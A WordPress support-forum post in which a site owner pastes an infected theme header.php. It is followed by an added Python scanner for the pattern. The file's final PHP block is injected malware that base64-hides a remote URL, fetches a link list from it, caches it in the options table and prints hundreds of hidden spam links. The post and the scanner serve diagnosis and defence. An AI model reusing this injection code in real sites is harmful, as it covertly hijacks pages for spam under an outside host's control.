Evil exploit in Header.php File
Has anyone else been hit by this – how to stop the exploit happening again?
I deleted the code twice now?? You can see the nasty stuff in the last lines at the bottom. Inserts about 600 invisible links for Viagra in your html source. XD
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="https://www.w3.org/1999/xhtml">
<head profile="https://gmpg.org/xfn/11">
<META name="verify-v1" content="vr+EovmENQbzitArGOodFTd10dFtSJ3h8bCkBPVdTdE=" />
<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
<title><?php bloginfo('name'); ?> <?php if ( is_single() ) { ?> » Blog Archive <?php } ?> <?php wp_title(); ?></title>
<meta name="generator" content="WordPress <?php bloginfo('version'); ?>" /> <!-- leave this for stats -->
<?php if (eregi("MSIE",getenv("HTTP_USER_AGENT")) || eregi("Internet Explorer",getenv("HTTP_USER_AGENT"))) { ?><link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/style-ie.css"/>
<?php } else { ?>
<link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_directory'); ?>/style-ie.css"/>
<?php } ?>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
<link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
<style type="text/css" media="screen"></style>
<?php wp_head(); ?>
</head>
<body>
<div id="topbar">
<div class="searchform"><?php include (TEMPLATEPATH . '/searchform.php'); ?></div>
<div class="nav"><a href="<?php echo get_settings('home'); ?>">Home</a> | <!-- <a href="">Link 1</a> | <a href="">Link 2</a> | <a href="">Link 3</a> | <a href="">Link 4</a> | <a href="">Link 5</a> | --> </div>
</div>
<div id="headerimg"></div>
<div id="page-top"><div id="page-bottom"><div id="page">
<?php /* wp_remote_fopen procedure */
$wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3Mv';
$opt_id='0687d858c81740b39cf1d01bdde2afc7';
$blarr=get_option('cache_vars');
if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.md5'))!=md5($blarr)){
    $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.txt'));
    update_option('cache_vars',$blarr);
}
$blarr=unserialize(base64_decode(get_option('cache_vars')));
if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){
    if($blarr['random']){
        $new='';
        foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k];
        $blarr['links']=$new;
    }
    $txt_out='';
    foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>';
    echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']);
}
/* wp_remote_fopen procedure */ ?>
Viewing 6 replies - 1 through 6 (of 6 total)
- The topic ‘Evil exploit in Header.php File’ is closed to new replies.
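One way to check a theme directory for the pattern in the header.php pasted above, as an added example that is not part of the original post. The names `scan` and `scan_tree` and the choice of rules are assumptions derived from that pasted block; this is not a general malware scanner.

```python
import base64
import binascii
import re
import sys
from pathlib import Path
# Rules below are derived from the injected block in the post (assumed to be representative).
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")
RULES = {
    "remote fetch of a base64-decoded URL": re.compile(r"wp_remote_fopen\s*\(\s*base64_decode"),
    "unserialize() of a base64-decoded blob": re.compile(r"unserialize\s*\(\s*base64_decode"),
}
OPTION_WRITE = re.compile(r"""update_option\s*\(\s*['"]([^'"]+)['"]""")

def scan(php_source):
    """Return (finding, detail) pairs for the text of one PHP file."""
    findings = []
    for literal in B64_LITERAL.findall(php_source):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not plain text once decoded
        if decoded.startswith(("http://", "https://")):
            findings.append(("base64 literal hides a URL", literal))
    for name, pattern in RULES.items():
        if pattern.search(php_source):
            findings.append((name, pattern.pattern))
    for option in OPTION_WRITE.findall(php_source):
        findings.append(("template writes to wp_options", option))
    return findings

def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for files with hits."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        found = scan(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits

# Constructed sample: statements abridged from the header.php in the post above.
SAMPLE = """<?php $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3Mv'; $blarr=get_option('cache_vars');
$blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).$opt_id.'.txt'));
update_option('cache_vars',$blarr);
$blarr=unserialize(base64_decode(get_option('cache_vars'))); ?>"""

if __name__ == "__main__":
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else {"SAMPLE": scan(SAMPLE)}
    for path, found in hits.items():
        print(path, *found, sep="\n  ")
```

Run it with the theme directory as the only argument. The pasted block also keeps its payload in the `cache_vars` option, so that row in the options table is worth inspecting alongside any file the scan flags.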